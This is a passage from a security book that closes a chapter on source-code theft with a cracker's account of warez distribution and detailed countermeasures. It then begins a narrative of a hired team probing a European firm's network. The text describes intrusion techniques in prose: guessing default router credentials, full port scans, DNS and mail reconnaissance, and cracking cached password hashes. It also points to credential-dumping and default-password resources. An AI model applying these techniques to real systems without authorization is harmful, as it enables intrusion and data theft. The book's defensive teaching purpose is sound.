just anyone can download it. In fact, the site prominently announces

  WE ARE A CLOSED GROUP SO F__K OFF

(The missing letters are, of course, supplied on the site.)
  On the other hand, if it’s a current product and not yet listed, that
means the cracker has scored a major coup. He can be the very first to
upload the cracked version of the software.
  Once a new package is uploaded, distribution begins swiftly, as Erik
described.

     There’s probably like maybe 50 core Warez sites in the world, pri-
     vate FTP sites. You upload to one of these sites, and within maybe
     an hour it’s replicated from that site to thousands of other sites
     around the world, through couriers.
     Maybe 50 to 200 times a day — say probably 100, that’s a pretty
     good average. One hundred programs a day are pirated this way.

  A “courier,” Erik explains, is a person who moves “the stuff” from one
cracker site to another. Couriers are “the next level down the food chain”
from the guys who crack the software.

     The couriers are watching three or four different sites. As soon as
     someone uploads [a cracked application] to the Warez site, and
     they spot it as something new, they download it and send it over
     to three or four other sites as fast as they can before anyone else.
     Now, at this point there’s maybe 20 sites that have it. Sometimes
     this might be two or three months before [the new software] even
     hits the stores.

  The next tier of couriers — guys who haven’t yet earned access to the
core Warez sites — spot the new item and go through the same process
of downloading it and then uploading it as fast as they can to as many
other sites as they can, to be the first one. “And it just filters down that
way and like within an hour, it’s gone twice across the world.”
  Some people get access to Warez sites through credits, Erik explained.
The credits are a type of cracker currency earned by contributing to the
mission of the sites, which is the distribution of cracked software. The
cracker usually supplies both the program and a tool that will generate
valid license keys or some other kind of workaround.
184                           The Art of Intrusion


  A cracker gets credits by being the first to upload the “crack” to a site
that doesn’t have it yet. Only the first person to upload a new application
onto a particular site receives credit.

      So they are very motivated to do it quickly. Therefore in no time,
      it’s seen everywhere. At that point people make copies of it on their
      own crack sites or newsgroups.
      The people like me who crack this stuff get unlimited access
      always — if you’re a cracker, they want you to keep contributing
      the good stuff when you’re the first person who has it.

   Some sites have the full program and the keygen. “But a lot of the crack
sites,” Erik explains, “don’t include the program, just the keygen. To
make [the files] smaller and to make it less likely that the Feds will shut
them down.”
   All of these sites, not just the top-tier core Warez sites but those two or
three levels down, are “hard to get on. They’re all private” because if one
of the site addresses became known, “the Feds wouldn’t just shut it down,
they’d shut it down, arrest the people, take all their computers, and arrest
anyone who has ever been on that site” because these FTP sites are, after
all, repositories of massive amounts of stolen intellectual property.

      I don’t even go to those sites anymore. I rarely go, because of the
      risks involved. I’ll go there when I need some software, but I never
      upload stuff myself.
      It’s actually really interesting because it’s extremely efficient. I
      mean what other business has a distribution system like that and
      everyone’s motivated because everyone wants something.
      As a cracker, I get invitations to access all these sites because all
      the sites want good crackers ’cause that’s how they get more couri-
      ers. And the couriers want access to the good sites because that’s
      where they get the good stuff.
      My group does not let new people in. Also, there’s certain things
      we don’t release. Like one time we released Microsoft Office, one
      summer, and it was just too risky. After that we decided to never
      do really big names like that anymore.
      Some guys go firebrand, get really aggressive about it and will sell
      the CDs. Especially when they start doing it for money, it draws
      more attention. They’re the ones who usually get busted.
      Now, for this whole thing with software, the same process happens
      with music and with movies. On some of the movie sites, you can
                Chapter 8   Your Intellectual Property Isn’t Safe             185

     get access to movies two or three weeks before they hit theaters some-
     times. That’s usually someone who works for a distributor or a
     duplicator. It’s always someone on the inside.


INSIGHT
The lesson of the story about Erik’s quest for the one last server software
package to complete his collection: In nature there seems to be no such
thing as perfection, and that’s even truer when humans are involved. His
target company was very security-conscious and had done an excellent
job at protecting its computer systems. Yet a hacker who is competent
enough, determined enough, and willing to spend enough time is nearly
impossible to keep out.
  Oh, sure, you’ll probably be lucky enough never to have someone as
determined as Erik or Robert attack your systems, willing to spend a mas-
sive amount of time and energy on the effort. But how about an
unscrupulous competitor willing to hire a team of underground profes-
sionals — a group of hacker mercenaries each willing to put in 12 or 14
hours a day and loving their work?
  And if attackers do find a crack in the wall in your organization’s elec-
tronic armor, what then? In Erik’s opinion, “When someone gets into
your network as far as I was into this network, [you] will never, ever, ever
get him out. He’s in there forever.” He argues that it would take “a
major overhaul of everything and changing every password on the same
day, same time, reinstalling everything, and then securing everything at
the same time to lock him out.” And you have to do it all without miss-
ing one single thing. “Leave one door open and I’m going back in again
in no time.”
  My own experiences confirm this view. When I was in high school, I
hacked into Digital Equipment Corporation’s Easynet. They knew they
had an intruder, but for eight years, the best minds in their security
department couldn’t keep me out. They finally got free of me — not
through any efforts of their own but because the government had been
kind enough to offer me a vacation package at one of their federal vaca-
tion resorts.


COUNTERMEASURES
Although these were very different attacks, it’s eye-opening to note how
many vulnerabilities were key to the success of both these hackers, and
hence how many of the countermeasures apply to both the attacks.
  Following are the main lessons from these stories.
186                           The Art of Intrusion


Corporate Firewalls
Firewalls should be configured to allow access only to essential services,
as required by business needs. A careful review should be done to ensure
that no services are accessible except those actually needed for business.
Additionally, consider using a “stateful inspection firewall.” This type of
firewall provides better security by keeping track of packets over a period
of time. Incoming packets are only permitted in response to an outgoing
connection. In other words, the firewall opens up its gates for particular
ports based on the outgoing traffic. And, as well, implement a rule set to
control outgoing network connections. The firewall administrator should
periodically review the firewall configuration and logs to ensure that no
unauthorized changes have been made. If any hacker compromises the
firewall itself, it’s highly likely the hacker will make some subtle changes
that provide an advantage.
   Also, if appropriate, consider controlling access to the VPN based on
the client’s IP address. This would be applicable where a limited number
of personnel connect to the corporate network using VPN. In addition,
consider implementing a more secure form of VPN authentication, such
as smart cards or client-side certificates rather than a static shared secret.


Personal Firewalls
Erik broke into the CEO’s computer and discovered that it had a per-
sonal firewall running. He was not stopped, since he exploited a service
that was permitted by the firewall. He was able to send commands
through a stored procedure enabled by default in Microsoft SQL server.
This is another example of exploiting a service that the firewall did not
protect. The victim in this case never bothered to examine his volumi-
nous firewall logs, which contained more than 500K of logged activity.
This is not the exception. Many organizations deploy intrusion preven-
tion-and-detection technologies and expect the technology to manage
itself, right out of the box. As illustrated, this negligent behavior allows
an attack to continue unabated.
   The lesson is clear: Carefully construct the firewall rule set to filter both
incoming and outgoing traffic on services that are not essential to busi-
ness needs, but also periodically review both the firewall rules and the
logs to detect unauthorized changes or attempted security breaches.
   Once a hacker breaks in, he’ll likely hijack a dormant system or user
account so he can get back in at a future time. Another tactic is to add
privileges or groups to existing accounts that have already been cracked.
Performing periodic auditing of user accounts, groups, and file permis-
sions is one way to identify possible intrusions or unauthorized insider
activity. A number of commercial and public domain security tools are
                Chapter 8   Your Intellectual Property Isn’t Safe        187

available that automate part of this process. Since hackers know this as
well, it’s also important to periodically verify the integrity of any security-
related tools, scripts, and any source data that is used in conjunction.
  Many intrusions are the direct result of incorrect system configurations,
such as excessive open ports, weak file permissions, and misconfigured
Web servers. Once an attacker compromises a system at a user level, the
next step in the attack is elevating the privileges by exploiting unknown
or unpatched vulnerabilities, and poorly configured permissions. Don’t
forget, many attackers follow a series of many small steps en route to a
full system compromise.
  Database administrators supporting Microsoft SQL Server should con-
sider disabling certain stored procedures (such as xp_cmdshell,
xp_makewebtask, and xp_regread) that can be used to gain further system
access.


Port Scanning
As you read this, your Internet-connected computer is probably being
scanned by some computer geek looking for the “low-hanging fruit.”
Since port scanning is legal in the United States (and most other coun-
tries), your recourse against the attacker is somewhat limited. The most
important factor is distinguishing the serious threats from the thousands
of script kiddies probing your network address space.
  There are several products, including firewalls and intrusion detection
systems, that identify certain types of port scanning and can alert the
appropriate personnel about the activity. You can configure most firewalls
to identify port scanning and throttle the connection accordingly. Several
commercial firewall products have configuration options to prevent fast
port scanning. There are also “open source” tools that can identify port
scans and drop the packets for a certain period of time.


Know Your System
A number of system-management tasks should be performed to do the
following:

       ●    Inspect the process list for any unusual or unknown processes.
       ●    Examine the list of scheduled programs for any unauthorized
            additions or changes.
       ●    Examine the file system, looking for new or modified system
            binaries, scripts, or applications programs.
       ●    Research any unusual reduction in free disk space.
188                         The Art of Intrusion


      ●    Verify that all system or user accounts are currently active, and
           remove dormant or unknown accounts.
      ●    Verify that special accounts installed by default are configured
           to deny interactive or network logins.
      ●    Verify that system directories and files have proper file access
           permissions.
      ●    Check the system logs for any strange activity (such as remote
           access from unknown origins, or at unusual times during the
           night or weekend).
      ●    Audit the Web server logs to identify any requests that access
           unauthorized files. Attackers, as illustrated in this chapter, will
           copy files to a Web server directory and download the file via
           the Web (HTTP).
      ●    With Web server environments that deploy FrontPage or
           WebDav, ensure that proper permissions are set to prevent
           unauthorized users from accessing files.


Incident Response and Alerting
Knowing when a security incident is in progress can help with damage
control. Enable operating system auditing to identify potential security
breaches. Deploy an automated system to alert the system administrator
when certain types of audit events occur. However, note that if an
attacker obtains sufficient privileges and becomes aware of the auditing,
this automated alerting system can be circumvented.


Detecting Authorized Changes in Applications
Robert was able to replace the helpdesk.exe application by exploiting a
misconfiguration with FrontPage authoring. After he accomplished his
goal of obtaining the source code to the company’s flagship product, he
left his “hacked” version of the helpdesk application so he could return
at a later date. An overworked system administrator may never realize
that a hacker covertly modified an existing program, especially if no
integrity checks are made. An alternative to manual checks is to license a
program like Tripwire3 that automates the process of detecting unautho-
rized changes.


Permissions
Erik was able to obtain confidential database passwords by viewing files
in the /includes directory. Without these initial passwords, he might have
been hindered in accomplishing his mission. Having exposed sensitive
                Chapter 8   Your Intellectual Property Isn’t Safe         189

database passwords in a world-readable source file was all he needed to
get in. The best security practice is to avoid storing any plaintext pass-
words in batch, source, or script files. An enterprise-wide policy should
be adopted that prohibits storing plaintext passwords unless absolutely
necessary. At the very least, files containing unencrypted passwords must
be carefully protected to prevent accidental disclosure.
  At the company that Robert was attacking, the Microsoft IIS4 server
had not been configured properly to prevent anonymous or guest users
from reading and writing files to the Web server directory. The external
password file used in conjunction with Microsoft Visual SourceSafe was
readable by any user logged in to the system. Because of these miscon-
figurations, the attacker was able to gain full control of the target’s
Windows domain. Deploying systems with an organized directory struc-
ture for applications and data will likely increase the effectiveness of
access controls.


Passwords
In addition to the other common password management suggestions
described throughout this book, the success of the attackers in this chap-
ter highlights some additional important points. Erik commented that he
was able to predict how other company passwords would be constructed
based on the passwords he had been able to crack. If your company is
using some standardized, predictable method that employees are
required to follow in constructing passwords, it should be clear that
you’re extending an open-door invitation to hackers.
  Once an attacker obtains privileged access to a system, obtaining pass-
words of other users or databases is a high priority. Such tactics as search-
ing through email or the entire file system looking for plaintext
passwords in email, scripts, batch files, source code includes, and spread-
sheets is quite common.
  Organizations that use the Windows operating system should consider
configuring the operating system so that LAN Manager password hashes are
not stored in the registry. If an attacker obtains administrative access rights,
he can extract the password hashes and attempt to crack them. IT person-
nel can easily configure the system so the old-style hashes are not stored,
substantially increasing the difficulty of cracking the passwords. However,
once an attacker “owns” your box, he or she can sniff network traffic, or
install a third-party password add-on to obtain account passwords.
  An alternative to turning off LAN Manager password hashes is to con-
struct passwords with a character set not available on the keyboard by
using the <Alt> key and the numeric identifier of the character, as
described in Chapter 6. The widely used password-cracking programs do
190                         The Art of Intrusion


not attempt to crack passwords using such characters from the Greek,
Hebrew, Latin, and Arabic alphabets.


Third-Party Applications
Using custom-built Web scanning tools, Erik discovered an unprotected
log file generated by a commercial FTP product. The log contained the
full path information for files that were transferred to and from the sys-
tem. Don’t rely on default configurations when installing third-party
software. Implement the configuration least likely to leak valuable infor-
mation, such as log data that can be used to further attack the network.


Protecting Shares
Deploying network shares is a common method of sharing files and direc-
tories in a corporate network. IT staff may decide not to assign passwords
or access control to network shares because the shares are only accessible
on the internal network. As mentioned throughout this book, numerous
organizations focus their efforts on maintaining good perimeter security,
but fall short when securing the internal side of the network. Like
Robert, attackers who get into your network will search for shares with
names that promise valuable, sensitive information. Descriptive names
such as “research” or “backup” just make an attacker’s job significantly
easier. The best practice is to adequately protect all network shares that
contain sensitive information.


Preventing DNS Guessing
Robert used a DNS guesser program to identify possible hostnames
within a publicly accessible zone file of the domain. You can prevent dis-
closing internal hostnames by implementing what is known as a split-
horizon DNS, which has both an external and an internal name server.
Only publicly accessible hosts are referenced in the zone file of the exter-
nal name server. The internal name server, much better protected from
attack, is used to resolve internal DNS queries for the corporate network.


Protecting Microsoft SQL Servers
Erik found a backup mail and Web server running Microsoft SQL Server
on which the account name and password were the same as the one iden-
tified in the source code “include” files. The SQL server should not have
been exposed to the Internet without a legitimate business need. Even
though the “SA” account was renamed, the attacker identified the new
account name and password in an unprotected source code file. The best
                Chapter 8   Your Intellectual Property Isn’t Safe       191

practice is to filter port 1433 (Microsoft SQL Server) unless it is absolutely
required.


Protecting Sensitive Files
The attacks in the main stories of this chapter succeeded in the end
because the source code was stored on servers that were not adequately
secured. In highly sensitive environments such as a company’s R&D or
development group, another layer of security could be provided through
the deployment of encryption technologies.
  Another method for a single developer (but probably not practical in a
team environment, where a number of people require access to the
source code of the product in development) would be to encrypt
extremely sensitive data such as source code with products such as PGP
Disk or PGP Corporate Disk. These products create virtual encrypted
disks, yet function in a way that makes the process transparent to the user.


Protecting Backups
As made clear in these stories, it’s easy for employees — even those who
are especially conscientious about security matters — to overlook the
need to properly secure backup files, including email backup files, from
being read by unauthorized personnel. During my own former hacking
career, I found that many system administrators would leave compressed
archives of sensitive directories unprotected. And while working in the IT
department of a major hospital, I noted that the payroll database was
routinely backed up and then left without any file protection — so any
knowledgeable staff member could access it.
  Robert took advantage of another aspect of this common oversight
when he found backups of the source code to the commercial mailing list
application left in a publicly accessible directory on the Web server.


Protecting against MS SQL Injection Attacks
Robert purposefully removed the input validation checks from the Web-
based application, which were designed to prevent a SQL injection
attack. The following basic steps may prevent your organization from
being victimized using the same kind of attack Robert was able to use:

      ●    Never run a Microsoft SQL server under the system context.
           Consider running the SQL server service under a different
           account context.
192                         The Art of Intrusion


      ●    When developing programs, write code that does not gener-
           ate dynamic SQL queries.
      ●    Use stored procedures to execute SQL queries. Set up an
           account that is used only to execute the stored procedures,
           and set up the necessary permissions on the account just to
           perform the needed tasks.


Using Microsoft VPN Services
As a means of authentication, Microsoft VPN uses Windows
Authentication, making it easier for an attacker to exploit poor passwords
for gaining access to the VPN. It may be appropriate in certain environ-
ments to require smart card authentication for VPN access — another
place where a stronger form of authentication other than a shared secret
will raise the bar a few notches. Also, in some cases, it may be appropri-
ate to control access to the VPN based on the client’s IP address.
  In Robert’s attack, the system administrator should have been moni-
toring the VPN server for any new users added to the VPN group. Other
measures, also mentioned previously, include removing dormant
accounts from the system, ensuring that a process is in place to remove
or disable accounts of departing employees, and, where practical, restrict-
ing VPN and dial-up access by day of the week and time of day.


Removing Installation Files
Robert was able to obtain the mailing lists he was after not by exploiting
the mailing list application itself but by taking advantage of vulnerability
in the application’s default installation script. Once an application has
been successfully installed, installation scripts should be removed.


Renaming Administrator Accounts
Anyone with an Internet connection can simply Google for “default
password list” to find sites that list accounts and passwords in the
default state as shipped by the manufacturer. Accordingly, it’s a good
idea to rename the guest and administrator accounts when possible. This
has no value, however, when the account name and password are
stored in the clear, as was the case with the company described in the
Erik attack.4


Hardening Windows to Prevent Storing Certain Credentials
The default configuration of Windows automatically caches password
hashes and stores the plaintext passwords used for dial-up networking.
               Chapter 8   Your Intellectual Property Isn’t Safe      193

After obtaining enough privileges, an attacker will attempt to extract as
much information as possible, including any passwords that are stored in
the registry or in other areas of the system.
   A trusted insider can potentially compromise an entire domain by using
a little social engineering when his workstation is caching passwords
locally. Our disgruntled insider calls technical support, complaining that
he cannot log in to his workstation. He wants a technician to come assist
immediately. The technician shows up, logs in to the system using her
credentials and fixes the “problem.” Soon thereafter, the insider extracts
the password hash of the technician and cracks it, giving the employee
access to the same domain administrator rights as the technician. (These
cached hashes are double-hashed, so it requires another program to
unravel and crack these types of hashes.)
   A number of programs, such as Internet Explorer and Outlook, cache
passwords in the registry. To learn more about disabling this functional-
ity, use Google to search for “disable password caching.”


Defense in Depth
The stories in this chapter demonstrate, even more vividly than others in
the book, that guarding the electronic perimeter of your company’s net-
works is not enough. In today’s environment, the perimeter is dissolving
as businesses invite users into their network. As such, the firewall is not
going to stop every attack. The hacker is going to look for the crack in
the wall, by attempting to exploit a service that is permitted by the fire-
wall rules. One mitigation strategy is to place any publicly accessible sys-
tems on their own network segment and carefully filter traffic into more
sensitive network segments.
  For example, if a backend SQL server is on the corporate network, a
secondary firewall can be set up that only permits connections to the port
running the service. Setting up internal firewalls to protect sensitive
information assets may be something of a nuisance but should be con-
sidered an essential if you truly want to protect your data from malicious
insiders and external intruders who manage to breach the perimeter.


THE BOTTOM LINE
Determined intruders will stop at nothing to attain their goals. A patient
intruder will case the target network, taking notice of all the accessible
systems and the respective services that are publicly exposed. The hacker
may lie in wait for weeks, months, or even years to find and exploit a new
vulnerability that has not been addressed. During my former hacking
career, I’d personally spend hours upon hours of time to compromise
194                                  The Art of Intrusion


systems. My persistence paid off, since I always managed to find that
crack in the wall.
   The hacker Erik put forth the same persistence and determination in his
efforts to obtain the highly prized source code over a two-year period.
And Robert, as well, undertook a complex, intricate series of steps both
in his single-minded efforts to steal millions of email addresses to sell to
spammers and in his effort, like Erik, to obtain source code that he had
targeted.
   You understand that these two hackers are by no means alone. Their
degree of persistence is not uncommon in the hacker community. The
people responsible for securing an organization’s infrastructure must
understand what they could be up against. A hacker has unlimited time
to find just one hole, while overworked system and network administra-
tors have very limited time to focus on the specific task of shoring up the
organization’s defenses.
   As Sun Tzu wrote so eloquently in The Art of War (Oxford University
Press, 1963): “Know thyself and know thy enemy; in a hundred battles
you will never be in peril. When you are ignorant of the enemy, but know
thyself, your chances of winning or losing is equal . . .” The message is
clear: Your adversaries will spend whatever time it takes to get what they
want. Accordingly, you should conduct a risk assessment to identify the
likely threats against your organization, and these threats should be taken
into account while you are developing a security strategy. Being well pre-
pared, and exercising a “standard of due care” by drafting, implement-
ing, and enforcing information security policies, will go a long way to
keeping the attackers at bay.
   If the truth be known, any adversary with enough resources can even-
tually get in, but your goal should be making that so difficult and chal-
lenging that it’s not worth the time.


NOTES
1. Interested in viewing your own LSA secrets and protected storage areas? All you need is a nifty
tool called Cain & Abel, available from www.oxid.it.
2. This site is no longer accessible, but others have taken its place.
3. More information on Tripwire is available at www.tripwire.com.
4. One popular site hackers use to check for locations with default passwords is www.phenoelit.de/
dpl/dpl.html. If your company is listed there, take heed.
              Chapter 9
                   On the Continent
You see little pieces of information, and the way things are phrased, and
you start to get a little bit of an insight of the company and the people that
are responsible for the IT systems. And there was kind of this feeling that
they knew about security but that maybe they’re doing something a little
bit wrong.
                                                                     — Louis




 A
           t the beginning of Chapter 8, we cautioned that the nontech-
           nical readers would find parts difficult to follow. That’s even
           more true in the following. Still, it would be a shame to skip
the chapter, since this story is in many ways fascinating. And the gist can
readily be followed by skipping over the technical details.
  This is a story about like-minded individuals working for a company
that was hired to hack a target and not get caught.


Somewhere in London
The setting is in “the City,” in the heart of London.
  Picture “an open-plan kind of windowless room in the back of a build-
ing, with a bunch of techie guys banding together.” Think of “hackers
away from society, not being influenced by the outside world” each
working feverishly at his own desk, but with a good deal of banter going
on between them.
  Sitting in this anonymous room among the others is a guy we’ll call
Louis. He grew up in a small, insular city in the north of England, began


                                       195
196                         The Art of Intrusion


fiddling with computers about the age of seven when his parents bought
an old computer so the children could start learning about technology.
He started hacking as a schoolkid when he stumbled on a printout of staff
usernames and passwords and found his curiosity stirred. His hacking
landed him in trouble early, when an older student (a “prefect,” in British
terminology) turned Louis in. But getting caught didn’t deter him from
learning the secrets of computers.
  Now grown tall, with dark hair, Louis no longer finds much time for
the “very English sports” — cricket and soccer — that he cared so much
about as a schoolboy.


Diving In
Some time back, Louis and his buddy Brock, pounding away at a nearby
computer, took on a project together. Their target was a company based
in a country in Europe — essentially a security company, dropping off
large sums of money as well as ferrying prisoners between jail and court,
and from one prison to another. (The idea of one company doing both
the Brinks-type job of moving cash around and also shuttling prisoners is
an eye-opener to Americans, but an arrangement that the British and
Europeans take for granted.)
   Any company that describes itself using the word “security” must seem
like a particularly hot challenge. If they’re involved with security, does
that mean they’re so security-conscious that there would be no way to
break in? To any group of guys with a hacker mentality, it must seem like
an irresistible challenge, especially when, as here, the guys had nothing to
start out with beyond the name of their target company.
   “We treated it as a problem to be solved. So, the first thing we did was
to find out as much information about this company as we could,” Louis
says. They began by googling the company, even using Google to trans-
late, since none of the group spoke the language of the country.
   The automated translations were close enough to give them a feel for
what the business was all about and how big it was. Though they aren’t
very comfortable with social engineering attacks, that possibility was
ruled out anyway because of the language barrier.
   They were able to map what IP address ranges were publicly assigned to
the organization from the IP addresses of the company’s Web site and its
mail server, as well as from the European IP address registry, Reseaux IP
Europeens (RIPE), which is similar to American Registry of Internet
Numbers (ARIN) in the United States. (ARIN is the organization that
manages IP address numbers for the United States and assigned territories.
                        Chapter 9   On the Continent                   197

Because Internet addresses must be unique, there is a need for some organ-
ization to control and allocate IP address number blocks. The RIPE organ-
ization manages IP address numbers for European territories.)
  The main Web site, they learned, was external, with a third-party host-
ing company. But the IP address of their mail server was registered to the
company itself and was located within their corporate address range. So,
the guys could query the company’s authoritative Domain Name Service
(DNS) server to obtain the IP addresses by examining the mail exchange
records.
  Louis tried the technique of sending an e-mail to a nonexistent address.
The bounce-back message would advise him that his e-mail could not be
delivered and would show header information that revealed some internal
IP addresses of the company, as well as some email routing information.
In this case, though, what Louis got was a “bounce” off of their external
mailbox; his e-mail had only gotten to the external mail server, so the
“undeliverable” reply provided no useful information.
  Brock and Louis knew it would make life easier if the company was
hosting its own DNS. In that case they would try to make inquiries to
obtain more information about the company’s internal network, or take
advantage of any vulnerability associated with their version of DNS. The
news was not good: Their DNS was elsewhere, presumably located at
their ISP (or, to use the British terminology, their “telecoms”).


Mapping the Network
As their next step, Louis and Brock used a reverse DNS scan to obtain
the hostnames of the various systems located within the IP address range
of the company (as explained in Chapter 4, “Cops and Robbers,” and
elsewhere). To do this, Louis used “just a simple PERL script” the guys
had written. (More commonly, attackers use available software or Web
sites for reverse DNS lookups, such as www.samspade.org.)
   They noticed that “there were quite informative names coming back
from some of the systems,” which was a clue to what function those sys-
tems had within the company. This also provided insight into the mindset
of the company’s IT people. “It just looked like the administrators had not
got full control over the information that is available about their network,
and that’s the first stage of intuition about whether you’re going to be able
to get access or not.” Brock and Louis thought the signs looked favorable.
   This is an example of trying to psychoanalyze the administrators, try-
ing to get into their heads about how they would architect the network.
For this particular attacker, “it was based in part on the knowledge of the
198                          The Art of Intrusion


networks and companies that we had seen in the particular European
country and the level of IT knowledge and the fact that the people in this
country were maybe a year and a half to two years behind the UK.”


Identifying a Router
They analyzed the network using the Unix flavor of “traceroute,” which
provides a count of the number of routers a data packet passes through
to reach a specified destination; in the jargon, this is referred to as the
number of “hops.” They ran traceroute to the mail server and to the bor-
der firewall. Traceroute reported that the mail server was one hop behind
the firewall.
   This information gave them a clue that the mail server was either on the
DMZ, or all the systems behind the firewall were on the same network.
(The DMZ is a so-called demilitarized zone — an electronic no-man’s-land
network that sits between two firewalls and that is ordinarily accessible
from both the internal network and the Internet. The purpose of the DMZ
is to protect the internal network in case any of the systems exposed to the
Internet are compromised.)
   They knew the mail server had port 25 open, and by doing a trace-
route, they also knew they could actually penetrate the firewall to com-
municate with the mail server. “We saw that that path actually took us
through this router device, and then through the next hop that seemed
to disappear, which was actually the firewall and then one hop behind
that we saw the mail server, so we had a rudimentary idea about how the
network was architected.”
   Louis said they often begin by trying a few common ports that they
know are likely to be left open by firewalls, and he named a few services
like port 53 (used by the DNS); port 25 (the SMTP mail server); port 21
(FTP); port 23 (telnet); port 80 (HTTP); port 139 and 445 (both used
for NetBIOS, on different versions of Windows).

      Before we conducted intrusive port scans, we were very keen to
      make sure we had an effective target list that didn’t include IP
      addresses for systems that were not being used. In the initial
      stages, you’ve got to have target lists without just blindly going
      out and simply scanning each IP address. After we do our target
      enumeration, we have maybe five or six end systems that we want
      to examine further.

  In this case they found only three open ports: a mail server, a Web
server with all the security patches installed that was apparently not being
used, and on port 23, the telnet service. When they tried to telnet in on
                        Chapter 9   On the Continent                        199

the device, they got the typical “User Access Verification” Cisco pass-
word prompt. So they were seeing a little bit of progress — at least they
had identified the box as a Cisco device.
  On a Cisco router, Louis knew from experience, the password is quite
often set to something quite obvious. “In this case we tried three pass-
words — the name of the company, blank, and cisco, and we could not
get into that router. So instead of creating too much noise at this point,
we decided to stop attempting to access the service.”
  They tried scanning the Cisco device for a few common ports but got
nowhere.

     So, on that first day we spent a great deal of time in analyzing
     the company and their network, and starting some initial port
     scans. I wouldn’t say we were about to give up, because there were
     still quite a few tricks that we’d certainly try again with any net-
     work before we actually started to give up.

  The sum total of their results for a whole day of effort didn’t go much
beyond having identified one single router.


The Second Day
Louis and Brock came in for their second day ready to start doing more
intensive port scanning. Using the term services to refer to open ports,
Louis explained:

     At this point we were thinking to ourselves that we need to find
     more services on these machines. So we turned the volume up a lit-
     tle bit and tried to find something that was really going to help us
     to get into this network. What we were seeing was that there was
     certainly good firewall filtering in place. We were really looking
     for something that was [being] allowed by mistake and/or some-
     thing that was misconfigured.

  Then, using the Nmap program, a standard tool for port scanning, they
did a scan with the program’s default services file that looked for some
1,600 ports; again they came up with the empty bag — nothing significant.
  “So what we did was a complete full port scan, scanning both the router
and the mail servers.” A full port scan meant examining more than 65,000
ports. “We were scanning every single TCP port and looking for any pos-
sible services on these hosts that we had on our target list at that point.”
  This time they found something interesting, yet strange and a little
perplexing.
200                           The Art of Intrusion


  Port 4065 was open; it’s unusual to find such a high port in use. Louis
explained, “What we thought at that point was that maybe they’ve got a
telnet service configured on port 4065. So, what we did was telnet into
that port and see if we could verify that.” (Telnet is a protocol for
remotely controlling another machine anywhere on the Internet. Using
telnet, Louis connected to the remote port, which then accepted com-
mands from his computer and responded with output displayed directly
to his screen.)
  When they tried to connect to it, they got back a request for a login
name and password. So they were right that the port was being used for
telnet service — but the dialog for user authentication was very different
than presented by a Cisco telnet service. “After a while, we identified it
as some 3COM device. This then really tweaked our enthusiasm for the
job because it isn’t often you find a Cisco box that looks like some other
device, or find some other service listed on a high TCP port.” But the
fact that the telnet service on port 4065 was running as a 3COM device
didn’t make sense to them.

      We had two ports open on one device and they identified them-
      selves as completely different devices made by completely different
      manufacturers.

  Brock found the high TCP port and connected to it using telnet.
“Once he got a log-in prompt, I shouted back to try admin [for the user-
name], with the usual suspect passwords like password, admin, and blank.
He tried various combinations of these three as the username and pass-
word, and hit gold after only a few attempts: the username and password
on the 3COM device were both admin. “At that point he shouted that
he got in,” Louis said, meaning that they were now able to get telnet
access to the 3COM device. The fact that it was an administrative
account was icing on the cake.

      Once we guessed that password, it was the initial high on the job.
      It was kind of the standard woo-hoo. We were working at differ-
      ent workstations. Initially, while we were doing the network and
      enumeration scanning, we were on our own machines and shar-
      ing information between us. But once he found the port that gave
      him access to that login prompt, I went over to his machine and
      we started working together, both at the same machine.
      It was great. It was a 3COM device and we got console access
      to it and maybe we’d gotten an avenue to investigate what we
      can do.
                       Chapter 9   On the Continent                      201

     The first thing we wanted to do was to find out exactly what the
     3COM device was, and why it was accessible on a high TCP port
     on the Cisco router.

   Through the command-line interface, they were able to query infor-
mation about the device. “We figured that maybe someone had plugged
the console cable from this 3COM device into the Cisco device and inad-
vertently enabled access.” That would make sense, as a convenient way
employees could telnet into the 3COM device through the router.
“Maybe there weren’t enough monitors or keyboards in the Data
Center,” Louis guesses, and they had jury-rigged a cable as a temporary
fix. When the need was over, the administrator who has strung the cable
had forgotten all about it. He had walked away, Louis figured, “quite
unaware of the consequences of his actions.”


Looking at the Configuration
of the 3COM Device
The guys now understood that the 3COM device was behind the fire-
wall, and that the administrator’s mistake had provided a circuitous path,
making it possible for an attacker to connect behind the firewall through
the open high port.
  Now that they had access to the 3COM console, they looked at the
configuration records, including the unit’s assigned IP address, and pro-
tocols being used for virtual private network connectivity. But they dis-
covered that the device also sat on the same address range as the mail
server and outside of an internal firewall, on the DMZ. “We concluded
that it actually sat behind the perimeter firewall and was protected from
the Internet using some sort of filtering rules.”
  They tried to look at the configuration of the device itself to see how
the incoming connections were set up, but through that interface they
couldn’t get enough information. Still, they guessed that when any user
connected to port 4065 on the Cisco router from somewhere on the
Internet, the connection was likely being made to the 3COM device that
was plugged into the Cisco router.

     So at this point we were very confident that we were going to be
     able to get access to the back end networks and gain more control
     over the internal network. At this point, we were in very good
     spirits but what the British call “pretty fagged,” already having
     put in the equivalent of two full working days.
202                           The Art of Intrusion


      We went to the pub and talked about how the next day was going
      to be great because we were going to then start by looking at some
      more end systems and kind of find our way deeper into the network.

  Curious about this 3COM device, they had set up to capture the real-
time console log. If any activity happened overnight, they would be able
to see it when they came in the next morning.


The Third Day
When Brock inspected the console log in the morning, he found that var-
ious IP addresses had come up. Louis explained:

      After looking around the 3COM device a little more, we realized
      it was some sort of VPN that remote users were using to connect
      to the company network from somewhere on the Internet.
      At this point, we were certainly enthused that we would get to
      gain access, in the same way that the legitimate users were gain-
      ing access.

  They tried to set up their own personal VPN interface on the 3COM
device by bringing up another interface on the 3COM box, with a dif-
ferent IP address, one that the firewall wasn’t explicitly filtering.
  It didn’t work. They found that the device couldn’t be configured
without disrupting legitimate services. They couldn’t bring up an identi-
cally configured VPN system, and the way the architecture was set up, it
restricted enough so that they couldn’t do what they wanted to.

      So this avenue of attack strategy faded quickly.
      We were a little bit down, a little bit quiet at this point. But it
      was very much the case that it’s the first try and there’s bound to
      be another way. We still had enough incentive, we still had access
      to this one device; we still had that foothold. We became kind of
      intense on taking this thing a little bit further.

   They were in the DMZ of the company’s network, but when they tried
getting connections out to their own systems, they were stymied. They
also tried doing a ping sweep (trying to ping every system on the net-
work) on the entire network, but from the 3COM system behind the
firewall, to identify any potential systems to add to their target list. If they
were any machine addresses in the cache, it meant that some device was
blocking access to the higher-level protocol. “After several attempts,”
Louis said, “we did see entries in the ARP cache, indicating that some
                        Chapter 9   On the Continent                      203

machines had broadcast their machine address.” (ARP, the Address
Resolution Protocol, is a method for finding a host’s physical address
from its IP address. Each host maintains a cache of address translations
to reduce the delay in forwarding data packets.)
   So there were definitely other machines in the domain, “but [they]
weren’t responding to pings — which is a classic sign of a firewall.”
